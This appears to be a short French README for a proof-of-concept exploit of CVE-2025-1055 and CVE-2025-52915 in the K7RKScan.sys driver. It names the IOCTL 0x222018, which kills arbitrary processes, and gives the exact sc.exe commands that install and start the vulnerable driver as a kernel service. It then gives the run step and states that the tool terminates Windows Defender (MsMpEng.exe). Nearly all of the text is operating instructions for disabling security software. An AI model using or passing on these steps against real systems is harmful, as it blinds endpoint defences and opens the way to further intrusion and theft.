
PoC pour CVE-2025-1055 et CVE-2025-52915 utilisant K7RKScan.sys
PoC pour CVE-2025-1055 et CVE-2025-52915 utilisant K7RKScan.sys. Ce PoC utilise l'IOCTL 0x222018 pour terminer des processus arbitraires.
Installation du driver :
sc.exe create K7RKScan_1516.sys binPath=C:\Users\Administrator\Downloads\K7RKScan_1516.sys type=kernel && sc.exe start K7RKScan_1516.sys
Exécution du PoC :
exploit.exe
Il terminera le processus MsMpEng.exe (Windows Defender).